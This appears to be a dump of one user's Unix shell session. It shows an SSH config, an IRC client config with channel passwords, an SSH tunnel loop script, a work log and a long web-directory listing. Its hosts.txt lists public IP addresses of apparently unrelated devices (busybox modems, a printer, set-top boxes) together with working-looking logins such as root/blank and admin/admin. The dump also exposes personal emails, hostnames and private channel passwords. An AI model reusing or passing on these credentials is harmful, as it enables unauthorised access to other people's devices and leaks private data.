Host subversions.gnu.org
	Protocol 1

Host amd64-linux1
	ProxyCommand ssh cf-shell.sf.net nc amd64-linux1 22

Host sparc-solaris1
	ProxyCommand ssh cf-shell.sf.net nc sparc-solaris1 22

Host x86-solaris1
	ProxyCommand ssh cf-shell.sf.net nc x86-solaris1 22

Host ppc-osx1
	ProxyCommand ssh cf-shell.sf.net nc x86-solaris1 22

Host jason-t61.local
	User jason.spence
$ cat dot-irssi-config
servers = (
  { address = "irc.stealth.net"; chatnet = "IRCnet"; port = "6668"; },
  {
    address = "irc.efnet.us";
    chatnet = "EFNet";
    port = "6667";
    autoconnect = "yes";
  },
  { 
    address = "irc.undernet.org";
    chatnet = "Undernet";
    port = "6667";
  },
  { address = "irc.dal.net"; chatnet = "DALnet"; port = "6667"; },
  { 
    address = "irc.quakenet.org";
    chatnet = "QuakeNet";
    port = "6667";
  },
  { address = "silc.silcnet.org"; chatnet = "SILC"; port = "706"; },
  {
    address = "irc.mozilla.org";
    chatnet = "mozilla";
    port = "6667";
    use_ssl = "no";
    ssl_verify = "no";
    autoconnect = "yes";
  },
  {
    address = "irc.gimp.net";
    chatnet = "gimpnet";
    port = "6667";
    use_ssl = "no";
    ssl_verify = "no";
    autoconnect = "yes";
  },
  {
    address = "irc.freenode.net";
    chatnet = "freenode";
    port = "6667";
    use_ssl = "no";
    ssl_verify = "no";
    autoconnect = "yes";
  },
  {
    address = "irc2.2ch.net";
    port = "6667";
    use_ssl = "no";
    ssl_verify = "no";
  },
  {
    address = "irc.2600.net";
    port = "6667";
    use_ssl = "no";
    ssl_verify = "no";
  }
);

chatnets = {
  IRCnet = {
    type = "IRC";
    max_kicks = "4";
    max_msgs = "5";
    max_whois = "4";
    max_query_chans = "5";
  };
  EFNet = { 
    type = "IRC";
    max_kicks = "4";
    max_msgs = "3";
    max_whois = "1";
  };
  Undernet = {
    type = "IRC";
    max_kicks = "1";
    max_msgs = "3";
    max_whois = "30";
  };
  DALnet = {
    type = "IRC";
    max_kicks = "4";
    max_msgs = "3";
    max_whois = "30";
  };
  QuakeNet = {
    type = "IRC";
    max_kicks = "1";
    max_msgs = "3";
    max_whois = "30";
  };
  SILC = { type = "SILC"; };
  mozilla = { type = "IRC"; };
  freenode = { type = "IRC"; };
  gimpnet = { type = "IRC"; };
};

channels = (
  { name = "#irssi"; chatnet = "ircnet"; autojoin = "No"; },
  { name = "silc"; chatnet = "silc"; autojoin = "No"; },
  { name = "#noisebridge"; chatnet = "freenode"; autojoin = "yes"; },
  { name = "#bifemunix"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#down"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#huggs"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#dnalounge"; chatnet = "gimpnet"; autojoin = "yes"; },
  { name = "#sysadmins"; chatnet = "efnet"; autojoin = "yes"; },
  {
    name = "#green";
    chatnet = "efnet";
    autojoin = "yes";
    password = "thekeyisme";
  },
  { name = "#depression"; chatnet = "EFNet"; autojoin = "yes"; },
  {
    name = "#irc_anon";
    chatnet = "efnet";
    autojoin = "yes";
    password = "anonymous";
  },
  { name = "#bsdcode"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#FreeBSDdrama"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#developers"; chatnet = "mozilla"; autojoin = "yes"; },
  #  { name = "#mrl"; chatnet = "EFNet"; autojoin = "yes"; },
  #  { name = "#sf2600"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#hackershells"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#bayarea"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#linux"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#geekissues"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#geekgirls"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#cdc"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#banality"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#rain"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#linkdump"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#urls"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#links"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#uptime"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#win95help"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#urls"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#infrared"; chatnet = "EFNet"; autojoin = "yes"; },
  { name = "#digrev"; chatnet = "efnet"; autojoin = "Yes"; },
  { name = "#seraph"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#seraphctl"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#green"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#bfu"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#alpha-def"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#rawfiles"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#rawfles"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#/win"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#crypto"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#scotus"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#openwrt"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#politics"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#balls"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#physics"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#math"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#p3n1x420s"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#mrl-ctf"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#jerkcity"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#rm-rf"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#japan"; chatnet = "efnet"; autojoin = "yes"; },
  {
    name = "#luvshack";
    chatnet = "efnet";
    autojoin = "yes";
    password = "analrape";
  },
  { name = "#gods"; chatnet = "efnet"; autojoin = "yes"; },
  {
    name = "#alpha-defense";
    chatnet = "efnet";
    password = "goteamhapa";
    autojoin = "yes";
  },
  { name = "#null"; chatnet = "efnet"; autojoin = "yes"; },
  { name = "#openwrt"; chatnet = "freenode"; autojoin = "yes"; }
);

// Blah blah snip snip

$ cat t.sh
#!/bin/sh
while true; do
	/usr/bin/ssh -nTNF $HOME/jrstools/t t@s
	sleep 10
done
$ cd ../
$ cat hosts.txt
66.126.237.108
66.126.237.107
67.116.3.57
66.116.3.61 17130592
99.53.80.161 00:1e:c9:5a:a8:c6
99.53.80.162 00:30:65:6b:07:72 
99.53.80.166 142241623104
filipcik707.shacknet.nu
j@hug.gs
j@perfectmachines.org
thalakan@metaindividual.com
gccx.fsffrance.org
jspence@b.armory.com
miarac.dyndns.org
dcyrt2.dyndns.org
thalakan@420.am
jspence@behemoth.strlen.net
j@83c.noisebridge.net:2022
jspence@genetikayos.com
ds1.hackershells.com:64999
sh.dyndns.org
331shad.dyndns.org
j@208.80.185.10
115.133.19.100 dmadmin/dmadmin
130.88.213.96 jetdirect printer
78.181.112.5 root/blank (the whole block is full of modems running
busybox)
78.179.153.91 more of the same
69.69.11.64 admin/1234
118.68.195.164 admin/1234
92.84.174.207 admin
201.219.70.171 admin
38.101.186.23 no password
79.180.56.109 root/dreambox
78.186.119.184 admin/admin
200.35.54.45 admin/admin
189.79.142.89 admin/admin
^pahct^
j@66.92.8.123
j@vm04.kiberpipa.org
$ ls -la hsq
total 220
-rw-r--r--    1 thalakan  thalakan    494 Mar 30 13:41 #8.log#
drwxr-xr-x    3 thalakan  thalakan   1536 Jul 13 11:05 .
lrwxr-xr-x    1 thalakan  thalakan     54 Mar 30 13:33 .#8.log -> thalakan@shaitan1.lightconsulting.com.49893:1201029435
drwxr-x---  141 thalakan  thalakan  26112 Jul 20 09:36 ..
-rw-r--r--    1 thalakan  thalakan   4066 Apr 30 19:02 0.log
-rw-r--r--    1 thalakan  thalakan   3820 Apr 30 12:47 0.log~
-rw-r--r--    1 thalakan  thalakan  16184 May 18 07:41 1.log
-rw-r--r--    1 thalakan  thalakan  12805 May 12 11:51 1.log~
-rw-r--r--    1 thalakan  thalakan     97 May  1 08:56 10.log
-rw-r--r--    1 thalakan  thalakan     95 Mar 27 13:14 10.log~
-rw-r--r--    1 thalakan  thalakan   4615 May 20 02:17 11.log
-rw-r--r--    1 thalakan  thalakan   4372 May 19 15:14 11.log~
-rw-r--r--    1 thalakan  thalakan    889 May  1 08:51 12.log
-rw-r--r--    1 thalakan  thalakan    856 Apr 20 12:53 12.log~
-rw-r--r--    1 thalakan  thalakan   1635 May 15 08:45 13.log
-rw-r--r--    1 thalakan  thalakan   1634 May  7 22:10 13.log~
-rw-r--r--    1 thalakan  thalakan   2409 May 15 13:54 14.log
-rw-r--r--    1 thalakan  thalakan   1970 Apr 28 14:36 14.log~
-rw-r--r--    1 thalakan  thalakan   6083 May 26 11:14 15.log
-rw-r--r--    1 thalakan  thalakan   5502 May 20 12:22 15.log~
-rw-r--r--    1 thalakan  thalakan    201 Apr 14 16:05 15.txt
-rw-r--r--    1 thalakan  thalakan     79 Apr 14 16:04 15.txt~
-rw-r--r--    1 thalakan  thalakan    643 Apr 15 15:02 16.log
-rw-r--r--    1 thalakan  thalakan    310 Apr 15 14:58 16.log~
-rw-r--r--    1 thalakan  thalakan    964 Apr 23 15:02 16.txt
-rw-r--r--    1 thalakan  thalakan     37 Apr 23 13:53 16.txt~
-rw-r--r--    1 thalakan  thalakan    213 Apr 27 17:40 17.log
-rw-r--r--    1 thalakan  thalakan    172 Apr 27 17:11 17.log~
-rw-r--r--    1 thalakan  thalakan    856 Apr 29 14:35 18.log
-rw-r--r--    1 thalakan  thalakan     91 Apr 29 11:57 18.log~
-rw-r--r--    1 thalakan  thalakan   2871 May  6 10:29 2.log
-rw-r--r--    1 thalakan  thalakan   2781 Apr 27 17:33 2.log~
-rw-r--r--    1 thalakan  thalakan   1084 Mar 31 15:06 3.log
-rw-r--r--    1 thalakan  thalakan    894 Mar 19 16:28 3.log~
-rw-r--r--    1 thalakan  thalakan   2594 May 15 08:40 4.log
-rw-r--r--    1 thalakan  thalakan   2592 May  7 22:09 4.log~
-rw-r--r--    1 thalakan  thalakan    512 Apr 20 13:38 5.log
-rw-r--r--    1 thalakan  thalakan    433 Mar 18 17:10 5.log~
-rw-r--r--    1 thalakan  thalakan   3486 Mar 27 12:38 6.log
-rw-r--r--    1 thalakan  thalakan   3478 Mar 23 18:38 6.log~
-rw-r--r--    1 thalakan  thalakan   4137 May  1 08:56 7.log
-rw-r--r--    1 thalakan  thalakan   4136 Apr 30 16:06 7.log~
-rw-r--r--    1 thalakan  thalakan    205 Mar 23 14:32 8.log
-rw-r--r--    1 thalakan  thalakan     96 Mar 23 14:28 8.log~
-rw-r--r--    1 thalakan  thalakan    902 May 26 12:46 9.log
-rw-r--r--    1 thalakan  thalakan    235 Mar 27 15:02 9.log~
-rw-r--r--    1 thalakan  thalakan    316 Jul 13 11:05 auth.txt
-rw-r--r--    1 thalakan  thalakan    182 Apr 23 12:13 auth.txt~
-rw-r--r--    1 thalakan  thalakan      0 May  5 11:02 c
drwxr-xr-x    5 thalakan  thalakan    512 Mar 30 09:10 cisco
-rw-r--r--    1 thalakan  thalakan   3958 Apr 20 10:52 cisco-checklist.txt
-rw-r--r--    1 thalakan  thalakan     32 Mar 19 16:16 cisco-checklist.txt~
-rw-r--r--    1 thalakan  thalakan   1826 Apr  1 10:59 field-checklist.txt
-rw-r--r--    1 thalakan  thalakan   1468 Apr  1 10:57 field-checklist.txt~
-rw-r--r--    1 thalakan  thalakan    428 Jul 10 09:33 hours1.txt
-rw-r--r--    1 thalakan  thalakan    352 Jul 10 09:22 jobcodes.txt
-rw-r--r--    1 thalakan  thalakan    241 May 15 08:31 jobcodes.txt~
-rw-r--r--    1 thalakan  thalakan      0 May  5 11:02 js
-rw-r--r--    1 thalakan  thalakan     87 Apr 29 20:42 new-task-checklist.txt
-rw-r--r--    1 thalakan  thalakan    190 Apr 15 11:51 service-profile.txt
-rw-r--r--    1 thalakan  thalakan    118 Apr 15 11:48 service-profile.txt~
-rw-r--r--    1 thalakan  thalakan    309 May  7 03:58 switches.txt
-rw-r--r--    1 thalakan  thalakan    150 May  1 17:55 switches.txt~
-rw-r--r--    1 thalakan  thalakan     26 May  5 10:57 test.html~
-rw-r--r--    1 thalakan  thalakan    299 Apr 21 14:19 vmware-clone-checklist.txt
-rw-r--r--    1 thalakan  thalakan    222 Apr 14 17:01 vmware-clone-checklist.txt~
$ cat hsq/1.log
NPN dial-demand routing

The NPN site has a Cisco 1800 series which does not do reliable dial
backup in the event that their frame relay connection fails.

Requirements:
 - Deterministic DDR behavior

Modem rack manuals:
http://www.multitech.com/DOCUMENTS/Collateral/manuals/88300150.pdf
http://www.multitech.com/DOCUMENTS/Collateral/manuals/S000326A.pdf 

Tuesday March 10 2009

1300h:
JW described the situation.  Investigated, found out that RIP was
enabled on both devices for no discernable reason.  Turned that off.

Read several examples of how to make it work.  

JW and I discovered that three DECserver 90 series terminal servers
all had the same failure mode, and one of them was supposedly known
good.[snip]$ cd public_html
$ ls -la
total 169266
-rwxr-xr-x    1 thalakan  thalakan       214 Jan 15  2004  
-rwxr-xr-x    1 thalakan  thalakan      4969 Jan 15  2004   
-rw-r--r--    1 thalakan  thalakan       178 Jan 15  2004  .c
-rwxr-xr-x    1 thalakan  thalakan       189 Jan 15  2004  .gz
-rw-r--r--    1 thalakan  thalakan         1 Jan 24  2002 #church#
-rw-r--r--    1 thalakan  thalakan         5 Mar 23  2004 #fere#
-rw-r--r--    1 thalakan  thalakan       223 Jan 28 01:04 #paybycard.html#
-rw-r--r--    1 thalakan  thalakan         2 Dec 10  2004 #so#
-rw-r--r--    1 thalakan  thalakan        13 Sep 13  2008 #soopha
-rw-r--r--    1 thalakan  thalakan        85 Sep  6  2004 #test.php#
-rw-r--r--    1 thalakan  thalakan       247 Oct 23  2004 #unhide.c#
drwxrwxr-x   25 thalakan  thalakan      8192 Apr 25 14:17 .
-rw-r--r--    1 thalakan  thalakan     31530 Jan  7  2004 .#code.html.1.45
-rw-r--r--    1 thalakan  thalakan      4857 Jan 25  2002 .#index.html.1.16
-rw-r--r--    1 thalakan  thalakan      4678 Mar 17  2002 .#index.html.1.18
-rw-r--r--    1 thalakan  thalakan      5129 Nov 14  2002 .#index.html.1.26
lrwxr-xr-x    1 thalakan  thalakan        54 Jan 28 01:04 .#paybycard.html -> thalakan@shaitan1.lightconsulting.com.16643:1201029436
-rw-r--r--    1 thalakan  thalakan     29367 Jul 21  2003 .#quotes.html.1.64
drwxr-x---  141 thalakan  thalakan     26112 Jul 20 09:41 ..
-rw-r--r--    1 thalakan  thalakan       162 Jul 24  2003 .htaccess
-rw-r--r--    1 thalakan  thalakan     46610 Jan 24  2002 06202000-log.txt
-rw-r--r--    1 thalakan  thalakan     49270 Jan 24  2002 08212000-log.txt
-rw-r--r--    1 thalakan  thalakan      2969 Jan 24  2002 09192000-log.txt
-rw-r--r--    1 thalakan  thalakan     24576 Oct 29  2006 102906.doc
-rw-r--r--    1 thalakan  thalakan       214 Jan 15  2004 123
-rw-r--r--    1 thalakan  thalakan       189 Jan 15  2004 2.gz
-rw-r--r--    1 thalakan  thalakan     33708 Dec 12  2004 203.248.130.1-254.html
-rw-r--r--    1 thalakan  thalakan     15733 Dec 12  2004 203.248.130.10.html
-rw-r--r--    1 thalakan  thalakan      2075 Feb  3 19:23 4chansearch.php
-rw-r--r--    1 thalakan  thalakan      1315 Jan  3  2009 4chansearch.php~
lrwxr-xr-x    1 thalakan  thalakan        24 Jan  3  2009 4chanulator.log -> ../100mget/pics/urls.log
lrwxr-xr-x    1 thalakan  thalakan        15 Jan  3  2009 4pics -> ../100mget/pics
-rw-r--r--    1 thalakan  thalakan      8321 Feb  7 19:51 AC_RunActiveContent.js
-rw-r--r--    1 thalakan  thalakan      2499 Feb 12  2002 BayonneMon.java
-rw-r--r--    1 thalakan  thalakan     31365 Nov 24  2004 Bitstream Vera Sans.fdb
-rw-r--r--    1 thalakan  thalakan     30385 Nov 24  2004 Bitstream Vera Serif.fdb
drwxr-xr-x    2 thalakan  thalakan       512 Apr 25 14:17 CVS
-rw-r--r--    1 thalakan  thalakan      4209 Jan 24  2002 Cccp.class
-rw-r--r--    1 thalakan  thalakan       323 Aug  9  2004 Cccp.html
-rw-r--r--    1 thalakan  thalakan      4498 Jan 24  2002 Cccp.java
-rw-r--r--    1 thalakan  thalakan      4011 Jan 24  2002 CoaxImpedance.class
-rw-r--r--    1 thalakan  thalakan       348 Aug  9  2004 CoaxImpedance.html
-rw-r--r--    1 thalakan  thalakan      4713 Jan 24  2002 CoaxImpedance.java
-rw-------    1 thalakan  thalakan    410017 Jul 30  2003 DSCN0312.JPG
-rw-------    1 thalakan  thalakan    405663 Jul 30  2003 DSCN0313.JPG
-rw-------    1 thalakan  thalakan    416617 Jul 30  2003 DSCN0314.JPG
-rw-------    1 thalakan  thalakan    419111 Jul 30  2003 DSCN0315.JPG
-rw-------    1 thalakan  thalakan    419552 Jul 30  2003 DSCN0316.JPG
-rw-------    1 thalakan  thalakan    414722 Jul 30  2003 DSCN0317.JPG
-rw-r--r--    1 thalakan  thalakan     22173 Jun 30  2004 Default.htm
-rw-r--r--    1 thalakan  thalakan     22176 Feb 18  2004 Default.htm~
-rw-r--r--    1 thalakan  thalakan    191333 Sep 12  2004 DiffPlot.nb
-rw-r--r--    1 www       thalakan         5 Jan 14  2009 GBDumpfile
-rw-------    1 thalakan  thalakan   4300800 Feb  1  2005 Mathematica.core
-rw-r--r--    1 thalakan  thalakan  90653001 Aug 11  2006 Mission Peak.zip
-rw-r--r--    1 thalakan  thalakan      3280 Mar  4  2002 Rollover.class
-rw-r--r--    1 thalakan  thalakan       312 Aug  9  2004 Rollover.html
-rw-r--r--    1 thalakan  thalakan      2686 Mar  4  2002 Rollover.java
-rw-r--r--    1 thalakan  thalakan     21715 Sep 27  2003 Techno.fdb
-rw-r--r--    1 thalakan  thalakan      2896 Jan 24  2002 TinyBrowser.class
-rw-r--r--    1 thalakan  thalakan      1501 Jan 24  2002 TinyBrowser.java
-rw-r--r--    1 thalakan  thalakan       545 Aug 11  2003 UserForm1.frm
-rw-r--r--    1 thalakan  thalakan      3096 Aug 11  2003 UserForm1.frx
drwxr-xr-x    2 thalakan  thalakan      1024 Sep  4  2008 WTF pictures
-rw-r--r--    1 thalakan  thalakan      2841 Feb 26  2002 ZeroWing.class
-rw-r--r--    1 thalakan  thalakan       322 Aug  9  2004 ZeroWing.html
-rw-r--r--    1 thalakan  thalakan      2506 Feb 26  2002 ZeroWing.java
-rw-r--r--    1 thalakan  thalakan      3342 Aug  9  2004 acroread-notes.html
-rwxr-xr-x    1 thalakan  thalakan      1278 Jun 19  2002 ariswatch.pl
-rw-r--r--    1 thalakan  thalakan      5267 Nov  4  2004 ariswatch.pl.html
-rw-r--r--    1 thalakan  thalakan      5267 Nov  4  2004 ariswatch.pl.html~
-rwxr-xr-x    1 thalakan  thalakan      1907 May  6  2002 ariswatch.pl~
drwxr-xr-x    3 thalakan  thalakan       512 Dec  3  2002 array
-rw-r--r--    1 thalakan  thalakan      5373 Jan 24  2002 articles-of-incorporation.rtf
-rwxr-xr-x    1 thalakan  thalakan       215 Jan 24  2002 ascii-histogram.pl
-rwxr-xr-x    1 thalakan  thalakan      1266 Jan 24  2002 autologin.s
-rw-r--r--    1 thalakan  thalakan       166 Jan 15  2004 b
-rwxr-xr-x    1 thalakan  thalakan      6117 Aug 11  2003 beancounter
-rw-r--r--    1 thalakan  thalakan      2515 Aug 11  2003 beancounter.c
drwxr-xr-x    3 thalakan  thalakan       512 Feb 21  2003 bighardsoftware.com
-rwxr-xr-x    1 thalakan  thalakan      6996 Oct 30  2005 bin2asc
-rw-r--r--    1 thalakan  thalakan      3303 May 28  2002 bin2asc.c
-rw-r--r--    1 thalakan  thalakan       840 Jun 10  2002 bin2c.c
drwxr-xr-x   14 thalakan  thalakan      1536 Aug 16  2002 blackhat2002
-rw-r--r--    1 thalakan  thalakan      2349 Dec  3  2002 blddeps.c
-rw-r--r--    1 thalakan  thalakan      2022 Jan 12  2004 bluebarh.gif
-rw-r--r--    1 thalakan  thalakan      2085 Jan 12  2004 bluebarv.gif
-rw-r--r--    1 thalakan  thalakan      1922 Apr 18  2007 bwmon.js
-rw-r--r--    1 thalakan  thalakan      1592 Dec 10  2004 bwmon.js~
-rw-r--r--    1 thalakan  thalakan      1671 Dec 12  2002 ca.crt
-rw-r--r--    1 thalakan  thalakan       265 Jan  3  2009 ca20.html
lrwxr-xr-x    1 thalakan  thalakan        11 Apr  6 03:27 ca20.log -> ../ca20.log
-rw-r--r--    1 thalakan  thalakan      1394 Feb 11  2002 cam-archive.html
-rw-r--r--    1 thalakan  thalakan     59093 May 21  2003 cam.jpg
-rw-r--r--    1 thalakan  thalakan       454 Feb  9 19:05 camera.swf
-rw-r--r--    1 thalakan  thalakan      2750 Sep 15  2008 castiron.txt
-rwxr-xr-x    1 thalakan  thalakan      4582 Oct 28  2003 cat
-rw-r--r--    1 thalakan  thalakan       312 Oct 28  2003 cat.c
-rw-r--r--    1 thalakan  thalakan       271 Oct 28  2003 cat.c~
-rwxr-xr-x    1 thalakan  thalakan      2288 Jan 24  2002 cccp-server.pl
-rw-r--r--    1 thalakan  thalakan      1227 Feb  9 18:12 cctest.swf
drwxr-xr-x    3 thalakan  thalakan       512 May  5  2005 cgi-bin
-rw-r--r--    1 thalakan  thalakan       477 Apr 22  2008 checkport.php
-rwxr-xr-x    1 thalakan  thalakan      2382 Jan 24  2002 chpasswds.pl
drwxr-xr-x    3 thalakan  thalakan       512 Feb 12  2002 church
-rw-r--r--    1 thalakan  thalakan     42445 Jan 24  2002 church-bylaws.rtf
-rwxr-xr-x    1 thalakan  thalakan       619 Jul 24  2003 cmosdump.c
-rwxr-xr-x    1 thalakan  thalakan      2931 Dec 19  2002 cmoswipe.asm
-rw-r--r--    1 thalakan  thalakan     32645 Sep 12  2004 code.html
-rw-r--r--    1 thalakan  thalakan      4689 Aug  9  2004 cpp-notes.html
-rw-r--r--    1 thalakan  thalakan      1330 Aug  9  2004 create-index.html
-rwxr-xr-x    1 thalakan  thalakan      3981 Aug  9  2004 create-index.pl
-rwxr-xr-x    1 thalakan  thalakan       578 Jan 24  2002 cryptmd5.pl
-rw-r--r--    1 thalakan  thalakan     18599 Aug 26  2008 cv.html
-rw-r--r--    1 thalakan  thalakan    505299 Jul 30  2003 d1_hashing.pdf
lrwxr-xr-x    1 thalakan  thalakan         7 Nov 18  2002 damn -> ../damn
-rw-r--r--    1 thalakan  thalakan      2779 Dec  3  2002 dbtest.c
-rw-r--r--    1 thalakan  thalakan      1237 Aug 26  2002 dc11.txt
-rw-r--r--    1 thalakan  thalakan      3558 Dec 25  2008 dpi.html
-rw-r--r--    1 thalakan  thalakan      3486 Sep  5  2008 dpi.html.~1.3.~
-rw-r--r--    1 thalakan  thalakan      1658 Mar  7  2006 dpi.html~
-rw-r--r--    1 thalakan  thalakan  11697180 Jun  6  2003 dr0.ogg
-rw-r--r--    1 thalakan  thalakan  11603500 Jun  6  2003 dr1.ogg
-rw-r--r--    1 thalakan  thalakan  11440189 Jun  6  2003 dr2.ogg
-rw-r--r--    1 thalakan  thalakan    136959 Jun  6  2003 dr3.ogg
drwxr-xr-x   17 thalakan  thalakan     12288 Jun 16 20:51 drop
drwxr-xr-x    4 thalakan  thalakan       512 Jan 24  2002 drunkenape
-rw-r--r--    1 thalakan  thalakan       393 Jun  3  2005 dujour-scan
-rw-r--r--    1 root      thalakan       262 Jun  3  2005 dujour-udp-scan
-rw-r--r--    1 thalakan  thalakan       342 Oct 30  2005 dump.txt
-rw-r--r--    1 thalakan  thalakan       312 Oct 30  2005 dump.txt~
-rw-r--r--    1 thalakan  thalakan       180 Oct 30  2005 dump2.txt
-rw-r--r--    1 thalakan  thalakan       161 Oct 30  2005 dump2.txt~
-rw-r--r--    1 thalakan  thalakan       405 Oct 30  2005 dump3.txt
-rw-r--r--    1 thalakan  thalakan       361 Oct 30  2005 dump3.txt~
-rw-r--r--    1 thalakan  thalakan      2330 Oct 30  2005 dump4.txt
-rw-r--r--    1 thalakan  thalakan       341 Oct 30  2005 dump4.txt~
-rwxr--r--    1 thalakan  thalakan      8137 Dec 10  2004 dump_selectors.c
-rwxr--r--    1 thalakan  thalakan      7952 Dec 10  2004 dump_selectors.c~
drwxr-xr-x    2 thalakan  thalakan       512 Feb  7  2007 ebay_bc
-rw-r--r--    1 thalakan  thalakan       846 May  7  2007 edit.php.bak
-rw-r--r--    1 thalakan  thalakan       845 May  7  2007 edit.php~
-rw-r--r--    1 thalakan  thalakan       741 Jun 19  2002 endpoint-list.php
-rw-------    1 thalakan  thalakan       722 Jun 19  2002 endpoint-list.php~
-rw-r--r--    1 thalakan  thalakan       543 Jun 19  2002 endpoints.php
-rw-r--r--    1 thalakan  thalakan       431 Jun 19  2002 endpoints.php~
-rw-r--r--    1 thalakan  thalakan      1778 Jan  7  2004 enummodules.c
-rw-r--r--    1 thalakan  thalakan      1157 Nov  6  2006 f1.js
-rw-r--r--    1 thalakan  thalakan      1054 Feb 23  2005 f1.js~
-rw-r--r--    1 thalakan  thalakan      1292 Feb 23  2005 f1.php
-rw-r--r--    1 thalakan  thalakan      1110 Feb 23  2005 f1.php~
-rwxr-xr-x    1 thalakan  thalakan      1907 Jan 24  2002 fedex.pl
-rw-r--r--    1 thalakan  thalakan       782 Aug  9  2004 file-list.txt
-rw-r--r--    1 thalakan  thalakan      1214 Oct 10  2003 file-list1.txt
-rw-r--r--    1 thalakan  thalakan     95077 May 26 12:34 fileindex.xml
-rw-r--r--    1 thalakan  thalakan   4111068 Jan 27 18:26 fileindex.xml~
-rwxr-xr-x    1 thalakan  thalakan      2426 Jan 24  2002 find.pl
-rw-r--r--    1 thalakan  thalakan    144994 Dec 13  2004 foo
-rwxr-xr-x    1 thalakan  thalakan      4968 Jan 15  2004 fork
-rw-r--r--    1 thalakan  thalakan       317 Aug  9  2004 frames.html
-rw-r--r--    1 thalakan  thalakan       211 Jan 24  2002 frames.html~
-rwxr-xr-x    1 thalakan  thalakan     35223 Aug  9  2004 freenix-programming-guide.html
-rw-r--r--    1 thalakan  thalakan      9930 Aug  9  2004 frys-notes.html
-rw-r--r--    1 root      thalakan     15779 Dec  1  2004 fun.png
-rw-r--r--    1 thalakan  thalakan      1952 Aug  9  2004 funny.html
-rw-r--r--    1 thalakan  thalakan       369 Jan 24  2002 gd_graph.cgi
-rw-r--r--    1 thalakan  thalakan       418 Jan 24  2002 gd_test.cgi
-rwxr-xr-x    1 thalakan  thalakan      1854 Oct 10  2003 getcoords.pl~
-rw-r--r--    1 thalakan  thalakan      3859 Nov 30  2002 gpdump.cap
-rw-r--r--    1 thalakan  thalakan    101275 Jan 24  2002 graendal.jpg
-rw-r--r--    1 thalakan  thalakan      4845 Aug 11  2003 hadamard.c
-rw-------    1 thalakan  thalakan    303104 Jan 15  2004 hexdump.core
-rwxr-xr-x    1 thalakan  thalakan      3152 Apr  4 16:49 howmuch.pl
-rwxr-xr-x    1 thalakan  thalakan      3342 Mar 26  2005 howmuch.pl.secure
-rw-r--r--    1 thalakan  thalakan        45 Jun  6  2003 ht_passwd
drwxr-xr-x   13 thalakan  thalakan      6656 Jun  4 05:40 images
drwxr-xr-x    2 thalakan  thalakan       512 Jul 13  2005 images1
drwxr-xr-x    2 thalakan  thalakan       512 Jul 13  2005 images2
drwxr-xr-x    2 thalakan  thalakan       512 Jul 13  2005 images3
-rw-r--r--    1 thalakan  thalakan      5571 Apr 19  2008 index.html
-rw-r--r--    1 thalakan  thalakan        95 Jul 22  2005 ip.php
-rw-r--r--    1 thalakan  thalakan     10293 Mar 13  2005 iz4.sxi
-rw-r--r--    1 thalakan  thalakan       208 Apr 26  2006 jlib.js
-rw-r--r--    1 thalakan  thalakan        53 Apr 26  2006 jlib.js~
-rw-r--r--    1 thalakan  thalakan      6113 Oct 23  2008 journey.js
-rw-r--r--    1 thalakan  thalakan      6056 Nov 24  2004 journey.js~
-rw-r--r--    1 thalakan  thalakan       465 Jun  3  2005 k.html
-rw-r--r--    1 thalakan  thalakan       456 Jun  3  2005 k.html~
-rw-r--r--    1 thalakan  thalakan     10201 Aug  9  2004 laptop-notes.html
drwxr-xr-x   15 thalakan  thalakan      2048 Dec 24  2007 lc
-rw-r--r--    1 thalakan  thalakan     22553 Aug  9  2004 links.html
-rw-r--r--    1 thalakan  thalakan     10811 Aug  9  2004 living-planes.html
-rw-r--r--    1 thalakan  thalakan      2585 Jan 24  2002 log
lrwxr-xr-x    1 thalakan  thalakan         8 Jan  3  2009 lolol -> ../lolol
-rw-------    1 thalakan  thalakan    217088 Aug 11  2003 ls.core
-rw-r--r--    1 thalakan  thalakan     10863 Mar 29  2006 ltphone-notes.html
-rwxr-xr-x    1 thalakan  thalakan     19196 Aug  9  2004 lw2f-notes.html
-rwxr-xr-x    1 thalakan  thalakan      1162 Jan 24  2002 mailer.cgi
-rwxr-xr-x    1 thalakan  thalakan       621 Jan 24  2002 make-logs.pl
-rwxr-xr-x    1 thalakan  thalakan      1341 Jan 15  2004 manlyedit.sh
-rw-r--r--    1 thalakan  thalakan      1516 Jan  6  2009 map-markers.html
-rw-r--r--    1 thalakan  thalakan      4589 Jan  6  2009 map.html
-rw-r--r--    1 thalakan  thalakan      1105 Jan  6  2009 map.html~
-rw-r--r--    1 thalakan  thalakan       393 Aug 11  2003 masmtsc.c
